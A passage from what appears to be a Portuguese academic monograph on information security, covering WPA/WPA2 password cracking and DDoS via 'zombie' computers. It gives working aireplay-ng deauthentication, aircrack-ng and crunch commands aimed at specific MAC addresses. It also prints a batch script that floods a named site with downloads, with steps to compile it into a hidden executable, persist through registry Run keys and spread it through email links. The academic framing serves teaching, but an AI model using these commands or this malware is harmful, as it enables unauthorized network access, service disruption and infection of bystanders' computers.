Way handshake. O WPA é uma espécie de rascunho do WPA2 e foi lançado prematuramente
para abrandar a urgência de um novo protocolo de segurança (FILHO, 2009). O protocolo
79
WPA foi totalmente reformulado e não possui muita semelhança com o WEP, porém, o
WPA2, não é muito diferente de seu antecessor WPA. Salvo algumas diferenças como o
algoritmo de criptografia mais robusto que foi implementado no WPA2, o funcionamento dos
dois é extremamente parecido.
Para um indivíduo que deseja descobrir a senha de determinada rede sem fio protegida
pelo protocolo de segurança WPA ou WPA2, e não pretende utilizar a engenharia social ou
técnica correlata para obtê-la, as mesmas ferramentas utilizadas na quebra de senhas que
utilizam o protocolo WEP podem ser utilizadas. Assim como no procedimento realizado para
o WEP, o primeiro passo para realizar um ataque inteiramente técnico, é iniciar a monitoração
e captura dos pacotes da rede em questão.
Capturar dados de ponto de acesso e canal específico. Figura 50
A partir do princípio de que, diferentemente do WEP, as senhas de redes sem fio que
são protegidas pelo protocolo WAP ou WPA2 não são iguais à da criptografia dos dados, é
possível concluir que, caso a intenção do atacante seja apenas a obtenção da senha, somente
os dados que são transmitidos durante o momento da autenticação são interessantes (o
handshake).
Verificar clientes conectados. Figura 51
80
Para capturar o handshake, basta fazer a captura dos dados com o “airodump-ng”;
assim que ele for detectado, aparecerá uma mensagem no canto superior direito da tela de
monitoramento. Após esse momento, o processo de captura pode ser interrompido e então
poderá ser iniciado o processo de descoberta de senha a partir do hash obtido.
Caso a rede possua poucos clientes e não haja pedidos de novas conexões, a fim de
acelerar o processo de captura do handshake, é possível desconectar algum cliente para que
ele conecte-se novamente e os dados de conexão sejam capturados.
Neste exemplo, foi verificado que o cliente cujo endereço físico era
“00:15:af:04:4c:8f” estava conectado ao ponto de acesso. O seguinte comando foi digitado
para desconectá-lo:
Aireplay-ng -0 2 -a 08:10:74:3e:a9:36 -c 00:15:af:04:4c:8f wlan0
Capturando handshake. Figura 52
No canto superior direito da imagem acima, é possível verificar que o “airodump-ng”
conseguiu capturar o handshake após o usuário ser desconectado e conectado novamente. O
parâmetro “2” passado logo no início do comando indica quantos pedidos de desconexão
serão enviados. Caso apenas dois sejam enviados, em condições normais, já é possível
capturar o handshake e o cliente da rede possivelmente nem perceberá que foi desconectado e
conectado novamente de forma automática. O atacante poderá saber se o comando foi bem
81
sucedido ao verificar o numero de Acknowledgements (ACKs) apresentados na tela. No
mesmo comando, caso o parâmetro “0” seja passado no lugar do “2”, serão enviados pedidos
de desconexão de forma ininterrupta, o que fará que o usuário não consiga mais acessar a
rede. Caso nenhum cliente seja especificado (com a opção “-c”), será feita a tentativa de
desconectar todos os usuários do ponto de acesso.
Com o hash da senha de rede capturado e armazenado, a captura de pacotes pode ser
cessada e o processo de descoberta da senha que corresponde ao hash capturado pode ser
iniciado. Com a finalidade de gerar um código a partir de uma sequência de caracteres e
comparar o código gerado com o capturado no processo de reautenticação, foi utilizada uma
lista de palavras a partir do comando:
“Aircrack-ng –w lista -b endereço-do-ponto-de-acesso dados-capturados”
Descobrir senha. Figura 53
Após algumas horas, a senha foi encontrada, exibida e o funcionamento do aplicativo
foi interrompido.
Senha encontrada. Figura 54
82
A descoberta da senha, neste caso, só foi possível devido ao fato de a mesma palavra
utilizada como senha para a rede existir na lista de palavras utilizada pelo “aircrack-ng”. De
forma avessa ao protocolo WEP, uma rede que utiliza o padrão WPA/WPA2 e possui uma
senha que seja formada por uma combinação maior que 10 caracteres, símbolos especiais e
números, pode exigir dias ou até anos para ter sua combinação secreta descoberta.
Para o exemplo apresentado neste trabalho, foi utilizada uma lista de palavras com
aproximadamente quinze gigabytes e que foi criada por uma combinação de programas para
extrair palavras de documentos, excluir as repetidas e adicionar caracteres ou combinar
palavras.
No caso da inexistência de uma lista de palavras ou a impossibilidade da criação de
uma, é possível utilizar o ataque de força bruta com a combinação dos programas “aircrack-
ng” e o “crunch” em um único comando, porém, caso a senha seja relativamente bem
elaborada, o processo pode tornar-se extremamente demorado. Contudo, caso a senha seja
parcialmente conhecida, o processo pode ser ainda mais rápido que a utilização de listas de
palavras. No caso da rede analisada nesta monografia, o comando poderia ser formado pelos
parâmetros a seguir:
/pentest/passwords/crunch/./crunch 10 10 -f charset.lst mixalpha-numeric -t
@erginho@@ | aircrack-ng *.cap -b 08:10:74:3e:a9:36 -w –
A utilização do comando acima resultaria na tentativa de descoberta de uma senha de
dez caracteres, cuja parte conhecida da senha é “erginho”. O aplicativo substituirá os
caracteres “@” de “@erginho@@” por letras e números até encontrar a senha correta. Caso
seja necessária a descoberta de uma senha de forma rápida e a partir de um computador
comum, programas que utilizam o poder de processamento das placas gráficas mostram-se
extremamente eficientes e podem diminuir substancialmente o tempo necessário para fazer os
cálculos de hash e encontrar um que seja idêntico ao que foi gerado pela senha original. O
aplicativo “Elcomsoft Wireless Security Auditor” é um bom exemplo de programa que
também utiliza o processador (GPU) de placas para aceleração gráfica, conhecidas por ter
bom desempenho em cálculos que envolvem operações com vírgulas flutuantes (floating
point), assim como os cálculos de hash.
83
4.5 Computadores “zumbis”
Neste tópico, são abordas algumas técnicas que crackers utilizam para realizar ataques
nos quais o real atacante é ocultado, além de técnicas que utilizam diversos computadores
para um único propósito. Estes tipos de ataques, além de prejudicar a vítima principal,
também podem prejudicar outras pessoas e frequentemente são utilizados para práticas que
exigem anonimato ou grande difusão de dados. Para a disseminação de um vírus, por
exemplo, um atacante pode inicialmente utilizar um computador que está com a segurança
fragilizada e pode ser facilmente manipulado, prejudicando assim, não só as vítimas que
fazem parte do alvo principal do atacante, como também, pode afetar o funcionamento do
computador que foi utilizado para o ataque inicial, como o computador de um laranja.
Segundo o Núcleo de Informação e Coordenação do Ponto BR, ao contrário do que muitos
pensam, um computador não precisa ser necessariamente invadido para que passe a realizar
ações não comandadas pelo utilizador principal da máquina. Basta que um programa,
conhecido popularmente como programa “zumbi”, se instale em um computador para que o
mesmo passe a ser um computador “zumbi”. A partir de um computador “zumbi”, é possível
realizar ataques de negação de serviço (Denial Of Service ou DoS), esquemas de fraude e
envio de mensagens indesejadas (NIC BR, 2005).
4.5.1 Ataque DDOS
O ataque chamado Distributed Denial of Service (DDoS), é um ataque de DoS que,
como o nome sugere, é distribuído, ou seja, parte de diferentes origens, não somente de um
único atacante. Um ataque DDoS, geralmente, visa tornar indisponível um site, aplicação ou
qualquer outro serviço, por meio da sobrecarga de informações que são enviadas ou recebidas.
Um exemplo simples e de fácil entendimento do DDoS pode ser verificado no caso de um
servidor de arquivos, não muito robusto, que, para ficar indisponível, basta que vários
usuários façam diversos downloads de arquivos ao mesmo tempo. Pra tornar um ataque DDoS
mais eficiente, um cracker pode fazer com que o ataque se origine do maior número possível
de computadores, utilizando para isso, computadores “zumbis”.
A fim de exemplificar a utilização de um computador zumbi para ataques DDoS, foi
criado um programa extremamente simples, cuja sua única função é fazer download dos
arquivos de um site de forma ininterrupta em uma data pré-determinada. Para que o programa
84
funcione corretamente, é necessário fazer a utilização de um software chamado “WGET”,
originalmente desenvolvido para o Linux, mas disponível para sistemas baseados em
plataformas Windows. O código abaixo pode ter somente a parte da data (29/01/2011) e os
locais onde está o endereço do site que será atacado (http://www.vitma.com.br) modificados para
funcionar corretamente.
@echo off rem Criado para fins acadêmicos por Pedro Ramos
if %date%==29/01/2011 goto acessar o site
goto fim rem Não fazer nada caso não seja o dia.
:acessar o site
@wget http://www.vitma.com.br --force-directories
@rd /q/s www.vitma.com.br
goto acessar o site
:fim
O código acima pode ser compilado com o “Bat To Exe Converter” para que seja
executado de forma oculta. O arquivo “wget.exe” deve ser anexado no momento da
compilação do programa. Para que ele seja executado de forma automática toda vez que o
Windows for iniciado, os comandos a seguir podem ser executados.
@echo off rem Criado para fins acadêmicos por Pedro Ramos
@mkdir %homepath%\sistema
@move /y ddos.exe %homepath%\sistema\ddos.exe
@attrib +R +S +H %homepath%\sistema\ddos.exe
@reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v windows /t REG_SZ
/d %homepath%\sistema\ddos.exe /f
@reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v windows /t
REG_SZ /d %homepath%\sistema\ddos.exe /f
Para funcionar corretamente, o programa compilado deve ser renomeado para
ddos.exe ou o código acima deve ser alterado a fim de corresponder ao nome do aplicativo.
Após ser devidamente alterado e compilado, quanto mais for distribuído e instalado
em outros computadores de redes diferentes, maior será a chance de sucesso de
indisponibilizar o site que é o alvo do ataque. O executável poderá ser distribuído por links
85
em e-mails ou outra forma de propagação. Este tipo de ataque dificilmente será bloqueado por
um firewall, visto que é baseado no download ininterrupto dos arquivos da página inicial de
um site, local que, teoricamente, não deve ter o acesso bloqueado. Um ataque deste tipo, além
de possivelmente deixar o site alvo fora do ar, deixará todos os computadores infectados com
a conexão extremamente lenta, pois, ficarão realizando downloads até que o aplicativo seja
finalizado (caso o usuário possua conhecimentos em informática) ou o computador seja
desligado. Além de ter a performance da conexão prejudicada, o computador infectado
também corre o risco de ter a conexão bloqueada por alguns sites.
4.5.2 Outros tipos de ataques feitos por computadores “zumbis”
Caso um cracker consiga realizar uma invasão em algum computador que possui
conexão com a internet, será possível promover os mais variados tipos de ataques a partir da
máquina desprotegida, porém, ainda há vários outros tipos de ataques que podem ser
realizados a partir de um computador sem invadi-lo.
Uma prática bastante realizada a partir de computadores “zumbis” é a prática de spam
(NIC BR, 2005). A simples execução de um programa ou um clique feito de forma distraída já
é o suficiente para instalar um programa cuja função é enviar mensagens eletrônicas não
solicitadas para milhares ou milhões de endereços de e-mail. Caso a infecção ocorra, o
computador infectado, também neste caso, sofrerá queda de desempenho.
A queda de desempenho computacional de um sistema não é a única consequência
sofrida ou sintoma de um computador “zumbi”. Outra possível ameaça que um computador
sofre é ter um servidor proxy instalado de forma imperceptível.
Um servidor proxy, da mesma forma que pode ser utilizado por alguém que queira
interceptar dados advindos de conexões de outrem, também pode ser utilizado para fazer
somente o redirecionamento de uma conexão. Um cracker que visa a invasão de uma conta
corrente de um banco, por exemplo, pode instalar servidores que são executados de forma
invisível em alguns computadores, utilizar um dispositivo de rede sem fio com o endereço
físico alterado para se conectar em uma rede Wi-Fi alheia, e criar uma rota totalmente
diferente, passando por diversos computadores até chegar ao da vítima, a fim de manter-se
anônimo. Em uma ação desse tipo, os investigadores precisarão fazer a rota contrária à da
conexão com o computador da vítima e, as pessoas que tiveram o computador infectado por
malwares, possivelmente tornar-se-ão suspeitas.
86
5 Considerações finais
A partir do texto contido nesta monografia, pode-se deduzir que boa parte dos atuais e
mais utilizados sistemas e procedimentos responsáveis por manter ou garantir a segurança de
informações, mostram-se ineficientes ou insuficientes e, as maneiras mais utilizadas para
mitigar tais problemas devem ser consideradas. Também é possível concluir que, a
substituição do simples aconselhamento pela demonstração das falhas e vulnerabilidades dos
sistemas e processos pode representar uma boa forma de diminuir os incidentes relacionados à
segurança de informações.
Baseando-se no conteúdo deste trabalho, também é possível concluir que muito se
ganha ao avaliar a real efetividade dos mecanismos de segurança oferecidos pelos fabricantes
de softwares e equipamentos. A sensação de segurança que algumas empresas e instituições
financeiras tentam passar aos usuários de seus sistemas pode resultar em conclusões errôneas,
como, por exemplo, a de que ataques de crackers são raros, inofensivos e direcionados a
pessoas ou entidades específicas.
Somente com o entendimento dos exemplos aqui apresentados, espera-se que um
usuário, cujos conhecimentos em informática não ultrapassam os básicos necessários para
acessar o site de uma instituição financeira, desconfie que dados secretos de sua conta
corrente podem ser desviados, mesmo após visualização de cadeados de segurança,
mensagens dizendo que o site é seguro, ainda que seja utilizada criptografia nos dados da
conexão e a empresa afirme que seu sistema de segurança é infalível.
É possível também concluir que, soluções tecnológicas e equipamentos eletrônicos,
em geral, são passíveis de fraude e, a desconfiança em pessoas, arquivos e processos que
aparentam ser seguros, é um dos primeiros passos para a proteção contra atos ardilosos e
criminosos cometidos dentro do âmbito computacional.
87
6 Referências bibliográficas
AGÊNCIA ESTADO. Hacker pede US$ 500 mil a banco e é preso em SP. Publicada em 08/06/2010. Disponível em http://www.estadao.com.br/noticias/geral,hacker-pede-us-500-mil-a-banco-e-e-preso-em-sp,563266,0.htm. Acesso em 15/09/2010. ASSUNÇÃO, Marcos Flávio de. Guia do Hacker Brasileiro. Editora Visual Books, Florianópolis, 2002. BHANSALI, Bhavin Hharat. Man-In-The-Middle Attack. SANS institute, Bethesda, 2001. CERT, Cordination Center. Spoofed/Forged Email. Disponível em http://www.cert.org/tech_tips/email_spoofing.html. Acesso em 15/09/2010. CERT.BR. Pesquisa indica crescimento acelerado de crimes de internet no Brasil. Disponível em http://www.nic.br/imprensa/clipping/2010/midia994.htm. Acesso em 15/11/2010. FECOMERCIO. II Congresso Crimes Eletrônicos e Formas de Proteção. Disponível em http://www.fecomercio.com.br/?option=com_eventos&view=interna&Itemid=11&id=2730. Acesso em 10/11/2010. FERREIRA, Aurélio Buarque de Holanda. Dicionário Aurélio da Língua portuguesa. 1. Ed. Rio de Janeiro, Editora Nova Fronteira, 1989. FILHO, Demócrito Reinaldo. A infecção do sistema DNS: a nova modalidade de phishing e a responsabilidade do provedor. Disponível em http://www.buscalegis.ccj.ufsc.br/revistas/index.php/buscalegis/article/viewFile/5804/5373. Acesso em 01/11/2010. FILHO, Wilson Leite da Silva. Análise teórica e prática da segurança de redes sem fio na cidade de São Paulo. Disponível em http://www.icofcs.org/2009/ICoFCS2009-PP12.pdf. Acesso em 12/11/2010.
G1SP, Portal de notícias da Globo. Quadrilha escolhia vítimas para sequestro pela internet, diz polícia. Disponível em http://g1.globo.com/sao-paulo/noticia/2010/08/quadrilha-escolhe-vitimas-para-sequestro-pela-internet-diz-policia.html Acesso em 09/10.2010. TRIBUNAL DE JUSTIÇA DE MINAS GERAIS. Banco indeniza por conta invadida. Publicada em 26/08/2010. Disponível em http://www.tjmg.jus.br/anexos/nt/noticia.jsp?codigoNoticia=22322. Acesso em 15/09/2010. MÓDULO SECURITY SOLUTIONS, 10ª Pesquisa Nacional de Segurança da Informação. Disponível em http://www.modulo.com.br/media/10a_pesquisa_nacional.pdf. Acesso em 13/09/2010.
88
MOREIRA, Daniela. Invasão de privacidade: bisbilhotar a vida do seu par pode dar cadeia. Disponível em http://idgnow.uol.com.br/internet/2006/06/09/idgnoticia.2006-06-09.9405240970/IDGNoticia_view/. Acesso em 07/09/2010. MORIMOTO, Carlos Eduardo. Dicionário de Termos de informática. 3. Ed. Disponível em http://www.dnocs.gov.br/php/util/downloads_file.php?&dir=&file=/home/util/livres/ebooks/informatica/Dicionario_de_Termos_de_informatica-3ed.pdf. Acesso em 14/09/2010. NIC BR SECURITY OFFICE. Aspectos de Segurança Relacionados ao Spam. Disponível em http://www.cert.br/docs/palestras/nbso-ct-spam2005.pdf. Acesso em 02/11/2010. OLIVEIRA, Wilson José de. HACKER- Invasão e Proteção. 2. Ed (ampliada). Florianópolis, Editora Visual Books, 2000. PAVARIN, Guilherme. Site da OAB é invadido por Crackers. Disponível em http://info.abril.com.br/noticias/seguranca/site-da-oab-pr-e-invadido-por-crackers-30052010-6.shl. Acesso em 15/09/2010. RODRIGUES, Renato. Pesquisa aponta os desafios da segurança em redes corporativas. Disponível em http://idgnow.uol.com.br/computacao_corporativa/2010/09/06/pesquisa-aponta-os-desafios-da-seguranca-em-redes-corporativas/. Acesso em 10/11/2010. ROHR, Altieres. Hacker; Definições gerais. Disponível em http://www.linhadefensiva.org/2005/05/hacker/. Publicada em 22/05/2005 às 12h59. Acesso em 09/09/2010. RUFINO, Nelson Murilo de. Segurança Nacional. Técnicas de ataque e defesa em redes de computadores. São Paulo, Editora Novatec, 2002. SAWAYA, Márcia Regina. Dicionário de informática & internet. Inglês/Português. São Paulo, Editora Nobel, 1999. SBARAI, Rafael. Cada vez mais exposição no facebook. Revista Veja on-line. Disponível em http://veja.abril.com.br/noticia/vida-digital/cada-vez-mais-exposicao-facebook-privacidade Publicada em 20/05/2010. Acesso em 15/09/2010. SANS INSTITUTE. DNS Spoofing by The Man In The Middle. Disponível em http://www.sans.org/reading_room/whitepapers/dns/dns-spoofing-man-middle_1567. Acesso em 20/09/2010. SANS INSTITUTE. SSL Man-in-the-Middle Attacks. Disponível em http://www.sans.org/reading_room/whitepapers/threats/ssl-man-in-the-middle-attacks_480. Acesso em 20/09/2010.
89
SIQUEIRA, Carol. Identidade com chip começará a ser emitida ainda neste ano. Notícias da câmara dos deputados. Disponível em http://www2.camara.gov.br/agencia/noticias/SEGURANCA/149977-IDENTIDADE-COM-CHIP-COMECARA-A-SER-EMITIDA-AINDA-NESTE-ANO.html. Acesso em 15/09/2010. SIQUEIRA, Flávio Augusto Maretti Sgrilli. Furto, supressão de dados sigilosos consignados em sites na internet de acesso restrito e o estelionato virtual. Disponível em http://jusvi.com/artigos/500. Acesso em 07/09/2010. TANENBAUM, Andrew. Computer Networks. 4 Ed. Amsterdam, Editora Prentice Hall, 2003. THOMPSON, Marco Aurélio. O Livro Proibido do Curso de Hacker. Salvador, ABSI – Associação Brasileira de Segurança na Internet, 2004. URIBE, Gustavo. Cracker que invadiu site do PMDB ataca PSDB. Disponível em http://www.estadao.com.br/noticias/nacional,cracker-que-invadiu-site-do-pmdb-ataca-psdb,540451,0.htm. Acesso em 16/09/2010. VALLE, James Della. 'Internet banking' seguro: proteja-se das ameaças virtuais. Disponível em http://veja.abril.com.br/noticia/vida-digital/internet-banking-seguro-proteja-se-ameacas-virtuais. Acesso em 01/11/2010.
